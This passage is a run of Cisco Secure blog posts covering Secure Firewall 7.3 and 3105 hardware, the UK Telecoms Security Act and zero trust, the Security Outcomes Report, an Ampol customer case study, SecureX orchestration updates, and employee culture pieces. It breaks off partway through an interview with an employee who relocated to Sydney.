The Virtual Tunnel Interface (VTI) Capabilities have been further enhanced with Dynamic Virtual Tunnel Interface (DVTI) capabilities allowing for simplified connectivity between branch and hub sites. Support has also been added for OSPF and EIGRP routing protocols in conjunction with Virtual Tunnel Interfaces for added flexibility with route-based VPNs as well as Loopback Interface configuration to aid with management services in a dynamic environment.

Reduced TCO

Secure Firewall 3105 Hardware

Alongside the new Software and further extending Cisco’s powerful Secure Firewall 3100 series hardware platforms launched earlier this year, the new Secure Firewall 3105 bridges the gap on both price and performance between the small and mid-range hardware platforms. Delivering all the key capabilities of the other appliances in the 3100 series such as Clustering, Dual Power Supplies and Network Module support, as well as impressive performance from Firewall, VPN and TLS decryption thanks to the new architecture, the 3105 model targets the lower end of the mid-range with 10Gbps throughput.

Expanded support in Microsoft Azure Cloud

As organisations continue to adopt services from public cloud providers, Cisco Security recognises the need to enable our customers the flexibility to deploy more form factors in more locations as well as the ability to scale to meet modern cloud network demands.

  • FMCv300 now in Microsoft Azure – Cisco’s largest virtual platform for managing Secure Firewall devices is now available for customers to deploy in Azure, allowing for the management of up to 300 devices from a single virtual platform with license portability from other virtual editions of Secure Firewall Management Center.
  • Clustering Support – Extending the clustering capabilities of Secure Firewall into the Microsoft Azure Cloud allowing for up to 16 virtual Firewalls to be clustered in order to scale out rapidly to meet the demand of our customers’ cloud applications
  • Support for Gateway Load Balancer – With Microsoft recently announcing General Availability of their Gateway Load Balancer implantation, Cisco Secure Firewall is now able to be used as the Network Virtual Appliance (NVA) allowing for easy insertion of security controls into the Microsoft Azure cloud without the need to re-architect an existing deployment.

Automated integration to Cisco Umbrella

Building on the DNS Integration capabilities delivered in Secure Firewall 7.2, customers leveraging the advanced capabilities of Cisco Umbrella can now significantly reduce the configuration overhead required to direct traffic to the Cisco Umbrella Cloud by making use of the SASE Topology capabilities in Secure Firewall 7.3. Customers can now automatically configure and manage IPSec Tunnels between Secure Firewall devices across their environment and the Umbrella Cloud as well as having a single view of the tunnel status directly within Secure Firewall Management Center.

Learn More

These are just some of the many new features in the 7.3 version. We encourage you to take download it here and try it out. You can find more information on the 7.3 software release here.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

The Upcoming UK Telecoms Security Act Part Two: Changing Mindset from Stick to Carrot

By Richard Archdeacon

In our last blog, we gave a rundown of what the Telecommunications (Security) Act (TSA) is, why it’s been introduced, who it affects, when it starts, and how firms can prepare. Here, we take a closer look into the themes introduced by the Act, explore how the telecoms industry can explore zero trust to further improve its security posture, and outline the benefits that can be gained when complying.

When the Telecoms Security Act (TSA) was introduced, it was labelled as ‘one of the strongest telecoms security regimes in the world, a rise in standards across the board, set by the government rather than the industry’ by Matt Warman, former Minister of State at the Department for Digital, Culture, Media, and Sport. The industry is certainly feeling the impending impact of the act – with one industry pundit at an event we ran recently describing it as a ‘multi-generational change’ for the sector.

One of the headline grabbers stemming from the Act are the associated fines. With the new powers granted to it by the Act, Ofcom now has the responsibility to oversee operators’ security policies and impose fines of up to 10 percent of turnover or £100,000 a day in case operators don’t comply or the blanket ban of telecoms vendors such as Huawei. Sounds like the typical ‘stick’-based costly compliance messaging that no-one particularly wants to hear, right? But what if the TSA had some ‘carrot’-based business benefits that are much less discussed?

The TSA introduces a new security framework for the UK telecoms sector to ensure that public telecommunications providers operate secure and resilient networks and services and manage their supply chains appropriately. ny of the themes introduced in the code of practice can be aligned with the themes in a zero trust security model, which are also a focus for CISOs.

Zero trust security is a concept (also known as ‘never trust, always verify’) which establishes trust in users and devices through authentication and continuous monitoring of each access attempt, with custom security policies that protect every application. At Duo, our approach to zero trust is:

  • First, accurately establish trust – to verify user and device trust and increase visibility
  • Second, consistently enforce trust-based access – to grant the appropriate level of access and enforce access policies, based on the principle of least privilege.
  • Third, change is inevitable, especially when it comes to risk, so continuously verify trust by reassessing trust level and adjust access accordingly after initial access has been granted
  • And fourth, dynamically respond to change in trust by investigating and orchestrating response to potential incidents with increased visibility into suspicious changes in trust level.

A crucial point to note here: much like a solution that claims to help with all aspects of the TSA, telecom providers should be wary of any vendor who claims to have a zero-trust product. Both are far much bigger than any ‘silver bullet’ solution purports to offer. But there is a good reason a zero-trust framework has been mandated by the US White House for all federal agencies, and recommended by the Australian Cyber Security Centre (ACSC) and the UK’s National Cyber Security Centre (NCSC).

As well as helping to mitigate the significant cyber risks presented to the telecoms industry, a zero-trust strategy provides many business benefits. Our recent Guide to Zero Trust Maturity shows that:

  • Organisations that reported a mature implementation of zero trust were more than twice as likely to achieve business resilience (63.6%) than those with a limited zero trust implementation.
  • Organisations that achieved mature implementations of zero trust were twice as likely to report excelling at the following five security practices:
    • Accurate threat detection
    • Proactive tech refresh
    • Prompt disaster recovery
    • Timely incident response
    • Well-integrated tech
  • Organisations that claimed to have a mature implementation of zero trust were 2X more likely to report excelling across desired outcomes such as greater executive confidence (47%).

A robust zero-trust security program includes phishing-resistant multi factor authentication (MFA), access controls for devices and applications, risk-signalling, dynamic authentication, firewalls, analytics, web monitoring and more. As I said previously there is no one answer to zero trust, or indeed the TSA, but getting the basics right like strong MFA, single sign on (SSO) and device trust are an easy and effective way to get started.

The TSA will be a huge undertaking for industry, but it is important to focus on the benefits such a wide-reaching set of regulatory rules will inevitably result in. As another guest from our recent event put it: ‘the TSA is full of the latest and modern best practice around security, so the aim really is to raise the tide and all ships, which can only be a good thing.’


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Is your firewall stuck in the 80s?

By Neville Letzerich

Modernize your firewall for greater security resilience

Cybersecurity has changed dramatically since the dawn of firewalls in the 1980s. But despite all the upheaval and innovation, they have stood the test of time. The basic concept of allowing “good” traffic to flow and blocking the bad stuff remains essential. Of course, it looks much different now than in the era of Care Bears and Cabbage Patch Kids.

Today’s workers, data, and applications are everywhere, and firewalls must be as well. There’s no longer just one finite space to defend. With the recent explosion of hybrid work and the rapid transition to multi-cloud environments, it’s imperative that firewalls evolve alongside a business — and be ready for whatever’s next.

So, can your firewall grow with you? Or is it stuck in the age of Hair Bands and He-Man?

The firewall is a critical foundation for security

The past few years have brought about a keen focus on resilience — remaining strong, yet adaptable in the face of unexpected and even unfathomable challenges. But an organization cannot persevere without security being at the forefront of any resilience strategy.

96% of executives consider security resilience highly important to their business.

Cisco Security Outcomes Report

Firewalls are a critical foundation for building powerful, resilient security infrastructure. Yet contemporary firewalls have to be and do more than one thing. Cisco Secure Firewall delivers world-class security controls wherever you need them, with unified visibility and consistent policy management and enforcement.

As a worldwide leader in networking and security, Cisco is better positioned than any other vendor to incorporate effective firewall controls into your infrastructure — anywhere your data and applications reside. According to a study conducted on behalf of Cisco by Forrester Research, Cisco Secure Firewall customers can:

  1. Reduce the risk of a breach by up to 80%
  2. Cut time needed for routine tasks by as much as 95%
  3. Achieve an ROI of 195% and a payback period of just 10 months

Cisco Secure Firewall delivers on several key aspects necessary for security resilience: visibility, flexibility, intelligence, integration, and unified controls. Together, they enable organizations to close gaps, see and detect threats faster, and adapt quickly to change.

Watch video: Cisco Secure Firewall Overview

VISIBILITY for better threat detection

With most of today’s internet traffic being encrypted, security measures can become obsolete without the ability to see into all traffic, encrypted or not. While decryption is commonplace, it is simply not feasible in many cases, and can have serious impacts on network performance. With its Encrypted Visibility Engine, Cisco Secure Firewall leverages deep packet inspection (DPI) to identify potentially malicious applications in encrypted traffic without offloading to another appliance and degrading performance.

Due to a highly distributed network and workforce, as well as constantly maturing attacks, the ability to see into every corner of your ecosystem is crucial. Cisco Secure Firewall blends multiple technologies to detect and block more threats in more places. By combining traditional firewall capabilities with URL filtering, application visibility and control, malware defense, and Snort 3 intrusion prevention, organizations gain robust protection against even the most sophisticated threats.

FLEXIBILITY for comprehensive coverage

Cisco offers a wide variety of firewalls for defending the different areas of your network — including physical, virtual, and cloud-native — as well as cloud-delivered. We can secure businesses and offices of all types and sizes, from the data center to the cloud.

Cisco Secure also provides flexible firewall management options, enabling you to deploy and operate your security architecture in a way that is tailored to the unique requirements of your NetOps, SecOps, and DevOps teams. No matter which firewall models you choose or environments you operate in (physical or virtual), you can use a single, simplified application to manage all your firewalls from one place.

THREAT INTELLIGENCE for rapidly updated defenses

The threat landscape changes every day, and our defenses must change with it. Cisco Talos is one of the largest and most trusted threat intelligence groups in the world. Its in-depth insight into global threats, and advanced research and analysis, enable us to quickly incorporate protections for new threats into our products via hourly updates. That way, Cisco customers are continuously safeguarded from both known and unknown threats.

“When the Log4j vulnerability was discovered, we were protected before we even completed our patching,” said Paul Smith, network administrator at Marian University. “As a result of automated hourly updates from Talos, Cisco Secure Firewall had an early detection signature, so it was already blocking the concerning traffic from infiltrating our network.”

INTEGRATION for centralized protection and automation

Another differentiator for Cisco Secure Firewall is that it’s part of an integrated security ecosystem. With Cisco SecureX, organizations can correlate data from multiple technologies and unleash XDR capabilities for a centralized, automated response to threats.

“At the end of the day, it’s about protecting the data, and we do that with the integration of [Cisco] Secure Endpoint, Umbrella, and Secure Firewall, which combine to protect the networks, endpoints, workstations, and servers — and all of this can be correlated easily within SecureX.”

– Elliott Bujan, IT Security Manager, Marine Credit Union

UNIFIED CONTROLS for efficacy and ease-of-management

The new Cloud-delivered Firewall Management Center leverages the cloud to facilitate agile, simplified operations for a distributed, hybrid network. It provides efficiency at scale by allowing security teams to swiftly deploy and update policies across their environment with just a few clicks, as well as take coordinated actions to prioritize, investigate, and remediate threats within a single pane of glass. And with a cloud-delivered management center, Cisco regularly updates its software behind the scenes, which reduces risk, maintains compliance, and gives your team more time to focus on other priorities.

Additionally, Cisco Secure Firewall dynamically shares policies driven by intelligence from Cisco Secure Workload, which uses microsegmentation to prevent lateral movement of attackers throughout a network. This allows security policies to be harmonized across both the network and application environments, boosting efficacy and fostering collaboration between teams.

Innovating for the future

These are just some examples of what makes up a comprehensive, modernized firewall. But Cisco is not stopping there. We continue to innovate to meet evolving business needs. For example, the new enterprise-class 3100 Series firewalls are specially designed for hybrid work, supporting more end users with high-performance remote access for increased organizational flexibility.

Additionally, Cisco Secure Firewall serves as a key component of advanced security strategies including XDR, SASE, and zero trust, helping businesses keep pace with accelerating digital transformation. According to Cisco’s most recent Security Outcomes Report, organizations with mature XDR, SASE, and zero trust implementations all boast significantly higher levels of security resilience.

Enhance your resilience with Cisco Secure Firewall

Fuel and energy retailer, Ampol, uses a variety of Cisco technologies, including Secure Firewall, to segment and safeguard its network. “Cisco was an integral part of our success during COVID-19 as we were able to serve customers without interruption in stores,” said Amir Yassa, senior project specialist at Ampol. “Deploying our retail resilience project, mostly comprised of Cisco products, enabled us to reduce our IT-related incidents by 90%, thus enabling us to serve our customers better now and into the future.”

Is your firewall keeping up with future demands, or is it still stuck in the 80s teasing its hair? If it’s the latter, we can help. Visit cisco.com/go/firewall and learn how to refresh your firewall.

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Cracking the Code to Security Resilience: Lessons from the Latest Cisco Security Outcomes Report

By Wendy Nather

“There’s so much left to know, and I’m on the road to find out.” –Cat Stevens (Yusuf)

Two years ago, we asked the question: What actually works in cybersecurity?

Not what everyone’s doing—because there are plenty of cybersecurity reports out there that answer that question—but which data-backed practices lead to the outcomes we want to implement in cybersecurity strategies?

The result was the first Security Outcomes Report, in which we analyzed 25 cybersecurity practices against 11 desired outcomes. And thanks to a large international respondent group, together with the mighty data science powers of the Cyentia Institute, we got some good data that raised as many questions as it answered. Sure, we found some strong correlations between practices and outcomes, but why did they correlate?

Last year, our second report focused in on the top five most highly correlated practices and tried to reveal more detail that would give us some guidance on implementation. We found that certain types of technology infrastructure correlated more with those successful practices, and therefore with the outcomes we’re seeking. Is architecture really destiny when it comes to good security outcomes? It does appear to be the case, but we had more research ahead of us to be more confident in a statement that sweeping.

All the while, we’ve been listening to readers considering what they’d like to glean from this research. One big question was, “How do we turn these practices into management objectives?” In other words, now that we have some data on practices we should be implementing, how do we set measurable goals to do so? I’ve led workshops in the UK and in Colombia to help CISOs set their own objectives based on their risk management priorities, and we’ve worked to identify longer-term targets that require close alignment with business leaders.

Achieving security resilience

Another question that took a front-row seat in our presentations and just wouldn’t leave: the topic of cyber resilience, or security resilience. It’s almost reached the status of a buzzword in the security industry, but you can understand why it’s ubiquitous.

“Among the upheaval of the pandemic, political unrest, economic and climate turbulence, and war, everyone is struggling to find a new ‘business as usual’ state that includes being able to adapt better to the shaky ground beneath them.”

But what exactly is security resilience, anyway? What does it mean to security practitioners and executives around the world? And what are the associated cybersecurity outcomes that we can identify and correlate? We know it doesn’t simply mean preventing bad things from happening; that ship has sailed (and sunk). We also know that security resilience doesn’t always mean full recovery from an event or condition that has knocked you down. Rather, it means continuing to operate during an adverse situation, either at full or partial capacity, and mitigating the effects on stakeholders. Ideally speaking, security resilience also means learning from the experience and emerging stronger.

What’s new in Volume 3

Security resilience is the focus of the third volume of our Security Outcomes Report: Achieving Security Resilience. It tells us how 4,700 practitioners across 26 countries are prioritizing security resilience: what it means to them, what they’re doing successfully to achieve it, and what they’re struggling with. Once again, the data gives us interesting ideas to ponder.

A stronger security culture boosts resilience by as much as 46%. By “culture,” we don’t mean annual compliance-driven awareness training. Cybersecurity awareness is what you know; security culture is what you do. When organizations score better at being able to explain just what it is that they need to do in security and why, they make better decisions in line with their security values, and that leads to better overall security resilience.

It doesn’t matter how many people you have; it matters whether you have any of them available in reserve to respond to events. Organizations with a flexible pool of talent internally (or on standby externally) show anywhere from 11% to 15% improvement in resilience. Which makes sense, as a fully leveraged team will be strained if they have to work even harder to take on an incident.

Because so many organizations around the world are looking to the NIST Cybersecurity Framework as a guidepost for cybersecurity practices, we also analyzed which NIST CSF capabilities correlated most strongly with our list of resilience outcomes. For example, our survey respondents that do a great job tracking key systems and data are almost 11% more likely to excel at containing the spread and scope of security incidents. From one angle, this seems like an obvious result, hardly worth mentioning. On the other hand, it’s worth presenting to your management some data that shows that investing in asset inventory solutions really does have long-range effects on your ability to stop an intrusion.

NIST Cybersecurity Framework activities correlated with security resilience outcomes.

And there’s much more. The report identifies—and then explores—seven success factors that, if achieved, boost our measure of overall security resilience from the bottom 10th percentile to the top 10th percentile. These include establishing a security culture and properly resourcing response teams, among others.

I hope this introductory blog—the first in a series exploring this latest report—whets your appetite to read the report itself. And remember, we are always aiming to reveal the next undiscovered insight that leads to better security outcomes. Please share your feedback and research requests with us in the comments below, or talk to us at the next security conference.

For more insights like what you’ve seen in today’s blog take a look at the Security Outcomes Report, Volume 3: Achieving Security Resilience.

Explore more data-backed cybersecurity research and other blogs on security resilience:


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Modernizing the Security of Australia’s Largest Fuel Network

By Lisa Snow

Ampol has been Australia’s leading transport fuel company since 1900. What began over 125 years ago is now an organization that powers a country, operating 1,500 retail stores and stations across ANZ, plus 89 depots for refining and importing fuels and lubricants, and 8,200 employees throughout Australia, New Zealand, the United States, and Singapore. And while Ampol’s history goes back a century, they are a modern organization, using internet of things (IoT) technology across operational and retail locations, with sensors on everything from electric vehicle charging units to fuel tank gauges to transportation trucks to refrigeration units inside retail stores.

As a critical energy provider to a country of over 25 million people, Ampol’s security needed to match its evolving infrastructure. As Satish Chowdhary, Network Enterprise Architect, said, “At Ampol, we have implemented sensor technology across our network: from gauges in the fuel tanks to monitor fuel quality and quantity to sensors that monitor the temperature in various refrigerators across our retail sites to ensure goods stay chilled. It’s critical to manage these devices effectively and securely, and that’s where Cisco comes in…With IoT, a major security risk is posed by dodgy legacy devices left unpatched and vulnerable within your network. Cisco’s TrustSec and VLAN segregation automatically isolate vulnerable devices, not exposing the rest of the network to risks from untrusted devices.”

 

Making security an enabler, not a hindrance

In addition to securing the IoT that let’s Ampol monitor and manage its critical operations, Cisco was able to create a comprehensive security environment that solved for their three strategic goals.

“Three key components of our cyber-resilient strategy were isolation, orchestration, and rapid recovery. Cisco SecureX nailed all three providing us a single interface to see all security events, and malicious files, thus expediting how fast we can isolate events and recover,” Chowdhary explained.  “Before using Cisco Secure, security was a hindrance, not an enabler for our IT team, employees, and even customers,” he added.

In fact, Cisco Secure helped Ampol improve their security posture so much that they were able to quickly pivot during the early days of the pandemic.

“When Covid triggered supply challenges during lockdowns, people not being able to access groceries turned to their local service station convenience stores to get what they needed.  For Ampol, maintaining that supply continuity was critical, not just for our business, but for the customers who were relying on us to get their supplies. And all of this was done when many employees were now having to work remotely… This was possible only because we could maintain our revamped locations, staff, clients, and business partners safe on our network – while still maintaining speed and efficiency. Cisco Secure was the ticket to Ampol’s resilience in the face of major change,” Chowdhary said.

Solving security challenges with speed and simplicity

In addition to enabling flexibility against supply chain fluctuations, Ampol is readily protected against  threats, cyberattacks, and other vulnerabilities. Their Cisco security solution included:

  • Cisco Secure Firewall and Identity Service Engines (ISE) allow Ampol’s 3rd-party vendors to safely access the network
  • Cisco Umbrella and Secure Endpoint protected network and wi-fi access at retail locations
  • Cisco Duo protected the SCADA pipeline network users and devices against phishing attacks and established device trust
  • Improved efficiency and threat detection with Cisco SecureX

“The major force for our Cisco Secure investment was simplification by integrating the entire Security portfolio…If we ever happen to have a cyber-attack, we can quickly find it and contain it,” Chowdhary said, adding, “The greatest outcome of using Cisco Secure is simplicity at its core. We achieved great efficiency integration, better visibility, and context that’s not hidden across five, ten, or fifteen consoles, and ultimately, greater security outcomes.”

To find out how else Cisco Secure is helping protect Ampol against sophisticated threats and other challenges, read the full Ampol case study.


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Rolling Up Our Sleeves: Employee Volunteers Empowered to Give Back

By Mary Kate Schmermund

For these Cisconians, hands-on is the way to go when it comes to giving back. Using Cisco’s Time2Give benefit that provides 10 paid days to volunteer each year, team members rolled up their sleeves to build homes, cuddle and care for animals, distribute food and more. If you also value giving back, check out our open roles. 

Building homes and hope 

Marketing Specialist, Global Events Julie Kramer used Time2Give to build a shed with Habitat for Humanity of Huron Valley. Kramer especially appreciated learning about the organization’s purpose in addition to learning how to build.  

John Hindman, an account executive, used Time2Give to spend a week in Nicaragua with SuNica, an organization centered on clean water and fellowship. Hindman cleared out downed trees, picked coffee and built treehouses to allow the organization to host more children from surrounding communities.

In the community Hindman visited, repurposing recycled materials is critical to the economy, and one way that happens is through “mining” the local landfill. Hindman’s team encouraged local employees and led games and activities for local children.

For those considering Time2Give, Hindman says, “Do it. Unplug, find something you’re passionate about, set up your out-of-office, and ignore everything work-related for the time you’re serving.”

Cuddling up with kindness

Animal lover Carrie Cordeiro, a Cisco Secure digital strategist/manager on the Brand Marketing team, volunteers with Hopalong and Muttville as a kitten cuddler and dog walker. Most of her time is spent transporting kittens, puppies, cats and dogs around the Bay Area to vet appointments, adoption centers and foster locations.

The best part for Cordeiro is “getting to interact with so many adorable animals,” she said. As for leadership support around utilizing Time2Give? “I love doing it and my management team absolutely supports it, especially when I share photos.”

Customer Success Manager Kristen Gehrke reminds us that, “You don’t always have to look far to utilize Time2Give.” She sewed a baby blanket for Bluebonnet Trails Community Services. “The best part of the experience was giving back to mothers and their babies, as I am an expecting mother myself,” she said.

Employee volunteers distribute care with consistency

Engineering Manager Blake Ellingham organized food pantry shelves and packed bags for food distributions with HTB Food Bank. “I love getting to do work with my hands that helps others,” he said.

Ellingham recommends scheduling something routine for Time2Give. “Consistency matters! By going in every week for a half day of volunteering, I was able to make great friends with the staff,” he said.

Giving back matters

From empowering youth globally and remotely to volunteering across community hubs, Cisconians deeply value innovative ways to contribute their time and talents.

If you are interested in increasing the impact of your skills and passions at work and beyond, check out our open positions.


 

We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

ALL IN at Cisco Live 2022 Melbourne: Building Security Resilience for the Modern Enterprise

By Yoshiyuki Hamada

After a three-year hiatus, Cisco Live 2022 Melbourne is back! Personally, it will be a special experience, attending with my team and leaders for the first time as the Asia Pacific Cybersecurity Lead.

I will be speaking on the “Top Priorities for IT and Security Leaders in 2023” on 7 December at the Cisco Secure Insights Live, covering key priorities for security leaders as we enter the new year. Please join me at the Security Experience Hub at the World of Solutions. You can also participate virtually.

Experts’ Insights on Enabling a Strong Security Culture and Resilience 

Today’s businesses require a strong culture of security and resilience that is pervasive throughout the organization to withstand uncertainty and emerge stronger. Hear from our Cisco security leaders on powering resilience across the enterprise in the following presentations:

Dive into 80+ security sessions by experts to uncover best practices to address key challenges, and maximize your technology investments.

Security Experience at the World of Solutions 

Explore the Security Experience Hub and Demo Stand at the World of Solutions Zone for exciting security activities:

  • Cybersecurity Operations Center – features demos on how to optimize security operations and empower your SecOps team with deep visibility and automation to enable them to effectively secure the business.
  • Cisco Secure Insights Live – 30+ bite-sized sharing sessions by industry experts and leaders on trends, innovations and the current threat landscape.
  • Security Demo Stand – end-to-end solution portfolio showcase, including Application Security, Extended Detection and Response (XDR), Network Security, Secure Access Service Edge (SASE) and Cloud Security, Secure Analytics, Secure Email, SecureX, Services and Zero Trust Security.
  • Security Resilience Pod – evaluate and benchmark your security posture , and get recommendations on how to improve existing security programs.

For those joining us online, we have the Cisco Secure Insights Live broadcast on all things security, and Cisco Live broadcast covering keynote presentations by industry leaders.

I’m excited for you to see how we can help you achieve security resilience and look forward to meeting you at Cisco Live 2022 Melbourne. I’m ALL IN, are you?

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

What’s NEXT with Michael Ebel at Atmosfy

By Tazin Khan

Throughout my career, I have noticed the way we “futurize” technology. Often, we are thinking of technology in five-to-ten-year increments. But the fact of the matter is – technology is moving faster than we can keep up. The minute we think we understand it, it’s already onto something new. That’s why here at Cisco, we’re focused on what’s NEXT. We all know technology will continue to grow at a rapid pace, our goal is to remain at the forefront of these changes.

After much anticipation, it’s finally here! I am excited to present the first episode of “NEXT” by Cisco Secure! “NEXT” is a video series illuminating simple conversations about complex topics. Our mission is twofold: First, we want to humanize cybersecurity. Second, we want to build a bridge between Cisco Secure and the ideas of the future.

CTO of Cisco Secure, TK Keanini and I sit down with Michael Ebel, CEO of Atmosfy. If you saw our preview, then you know Atmosfy is on a mission to help inspire others and support local restaurants through live videos.

What you’ll learn in this episode:

  • How an ex-bartender turned Air Force Captain took the turn to become a tech founder.
  • What it means to be resilient in one’s security practice.
  • How security isn’t just the security team’s responsibility, it’s everyone’s responsibility, including marketing, PR, business operations, even your customers.

Want to learn what’s NEXT for Michael Ebel and Atmosfy? Check out our episode!


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

Reducing Friction in SecureX Orchestration

By Matt Vander Horst

Since releasing SecureX orchestration, we’ve regularly published two types of content for our customers to import and use: atomic actions and workflows. Atomic actions are small, re-usable functions that allow you to do simple things like isolating an endpoint in Cisco Secure Endpoint. Workflows are more complex combinations of activities, often made up of multiple atomic actions, that accomplish a broader objective. One of our most popular workflows fetches blog posts from Talos and then conducts an investigation into each post using a customer’s SecureX-integrated products. As of this blog post’s publishing, we’ve released 75 workflows. So, let’s talk about what’s new…

SecureX Tokens

In the past, when you wanted to communicate with SecureX APIs, you had to go through a multi-step process to generate an API client, use that API client to get a token, and then refresh the token every 10 minutes. This process wasn’t exactly simple, so in April we released the new SecureX Token account key. This special type of account key allows you to integrate with SecureX APIs without creating an API client, generating a token, or worrying about when the token expires. Simply use a SecureX target in conjunction with a SecureX Token account key and the platform takes care of the tokens. For more information about this update and how to take advantage of this new functionality, check out our documentation. Keep in mind that if your orchestration tenant was created prior to April 2022, you may need to create a SecureX Token.

Now that we have SecureX Token account keys and customers have been using them for a few months, we decided it was time to update all of our previously published workflows to be fully compatible with the new account key type. All 24 workflows using SecureX APIs have now been updated to leverage SecureX Tokens. For more information about Cisco-published workflows, check out our workflow list.

Cisco Secure Firewall + SecureX Orchestration

Since Cisco Secure Firewall is almost always deployed on-premises and behind a firewall, integrating it with SecureX orchestration in the cloud has required the use of a SecureX orchestration remote. Not all of our customers are interested in deploying an on-premises virtual machine or they lack a VMware ESXi deployment within which to run the VM. Now, with the release of the SecureX Security Services Exchange (SSE) API proxy, you can integrate your SSE-registered FMC devices with orchestration workflows without the need for additional remotes or virtual machines. To show how this works and highlight how easy this integration is, we re-released five of our existing FMC workflows with support for the SSE API proxy:

Resources

To stay updated on what’s new with SecureX, check out the following resources:

 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

UN’s International Day of Tolerance is a good reminder that workforce diversity should be 365-day goal

By Shailaja Shankar

Since 1996, United Nations members have commemorated Nov. 16 as International Day of Tolerance. As a word, tolerance can mean different things to different people and cultures. The UN defines tolerance as: “respect, acceptance and appreciation of the rich diversity of our world’s cultures, our forms of expression and ways of being human.” I define it slightly differently. To me, tolerance is acceptance. Tolerance is inclusion. Tolerance is humanity. Tolerance is letting people be and live authentically as they choose.  

Being able to live authentically is key. It’s about creating an environment for everyone to fit in and feel a sense of belonging. In a way, this means obfuscating the “standard” and stop paying attention to the degrees of variation from it.  Tolerance is a step one in that process and a critical step toward a more diverse and tolerant world.  

But if this is the goal, I say we have lots of work left in promoting this within our workforce, especially in the cybersecurity industry. I wrote extensively about this in a blog last year on why diversity matters so much to create stronger cybersecurity organizations. I pointed out that cybersecurity as a technology is multi-faceted and constantly changing. So, it would make sense that a highly diverse organization would provide different perspectives and more creative solutions to these challenges. 

Cybersecurity workforce by the numbers 

Even in the face of this logical goal of creating more diverse workforces, legacy recruiting, education, and even hiring practices are holding us back as an industry. I’ll look at one workforce populations specifically, women in cybersecurity. Currently, women constitute less than 25 percent of the workforce in cybersecurity. Of course, this is inclusive of all roles in cybersecurity meaning that I think it’s fair to say that the percentage of women in technical cybersecurity roles (e.g., software and hardware engineering) would be much lower. That’s discouraging, especially when there are still more than 700,000 cybersecurity positions that remain unfilled, many of them being high-paying roles. 

Perhaps the more important question is “why?” The International Information System Security Certification Consortium (ISC2) commissioned a study to examine this issue closely and came up with some important conclusions that I’ll summarize. 

  1. Women, especially when they are girls, tend to self-select out of pursuing cybersecurity careers because they believe they have to be “much more accomplished than men in order to get equal treatment”.  
  2. Cybersecurity work itself has an image issue that may not be appealing to women with its intense war-room and cloak-and-dagger, spy-vs-spy metaphors. I have personally experienced this myself and wrote in my earlier blog about my belief that I had to act like just “one of the guys” just to fit it. Perception or not, the feelings are real, and we must acknowledge it as an issue. 
  3. Though not limited to the cybersecurity industry, it is a reality that women tend to be paid less and get promoted more slowly compared to their male counterparts. This is a contributing factor for women tending to leave the field more quickly than men. Of the three issues I’ve listed, I believe this is the most fixable. The first step of any solution is to understand that there is a problem. In other words, if the cybersecurity industry is going to be more tolerant and diverse, we have to understand what intolerance and lack of diversity looks like. 

The path towards more tolerance and diversity 

In promoting the International Day of Tolerance, Secretary-General Ban Ki-moon listed three ways we as a global society can be more tolerant: education, inclusion, and opportunities. As it happens, those are also exactly the approaches required to create more diverse workforces.  

Of the three, I believe education (the earlier the better) is key as it’s foundational to being able to take advantage of inclusion and opportunities. Yes, we must continue to invest in STEM education and encourage more girls and minorities to take part. But the harder challenge is to somehow overcome the perception issue among large parts of these populations that the STEM field is not for them.  

I believe that will require an investment in time and interaction in the form of mentoring and community outreach. For example, the Cisco Women in Technology employee resource organization that I’m proud to be the executive sponsor for, started a coding bootcamp targeting underrepresented populations. There will be many more bootcamps next year including weeklong camps in the summer. We need more of this, much more and I know there are many companies in cybersecurity who have similar aspirations and programs. 

So, on this International Day of Tolerance, I ask my fellow cybersecurity professionals to at least think of ways they can influence someone in an underrepresented population to explore a career in the STEM field including cybersecurity. Take part in local volunteer activities at a school, especially in an inner-city one, like the kind that the Cisco Networking Academy is renowned for. Join and be an active participant in one of many cybersecurity organizations and affinity groups. Become a sponsor and a mentor to a girl or a minority and help encourage them to get ready to join this exciting and lucrative industry. 

But whatever you do, get started. Author and activist Rachel Cargle spoke to us earlier this year as part of our Black History Month celebration about what it means to show up with purpose toward addressing many injustices that still exist today. There’s an incredible disconnect here between humanity and dignity and all of this stuff in the country, and that should hopefully push you to action,” she said. Indeed, as these are issues that have existed for decades, and we will not solve them in a day, a month, or even a year. But if we don’t start, I’m afraid that the diversity issues that I’ve highlighted will be much the same in the International Day of Tolerance for years to come. 


We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Secure on social!

Cisco Secure Social Channels

Instagram
Facebook
Twitter
LinkedIn

From Austin to Sydney: How to Work From Anywhere

By Mary Kate Schmermund

SaaS Security Marketing Manager Laura O’Melia has always been interested in living and working internationally. After living in Austin, Texas for twenty years, O’Melia was ready for a new adventure and decided to move to Sydney, Australia with the support and encouragement of her manager and Cisco. The pandemic delayed her plans, but now that O’Melia’s settling into life and work in Australia, she shared how she made the move to work from anywhere and how you can, too.

Solving problems on a global scale in a flexible environment

What do you do?

O’Melia: I am on the Security Marketing team and focus on driving demand for our Zero Trust solution in the Asia-Pacific, Japan and China (APJC) region. I work closely with the Sales teams to do activities that will generate pipeline and educate prospects on our security solutions. I spend time finding new leads and trying new ways to engage with our top prospects while having fun along the way.

What do you like most about working at Cisco?

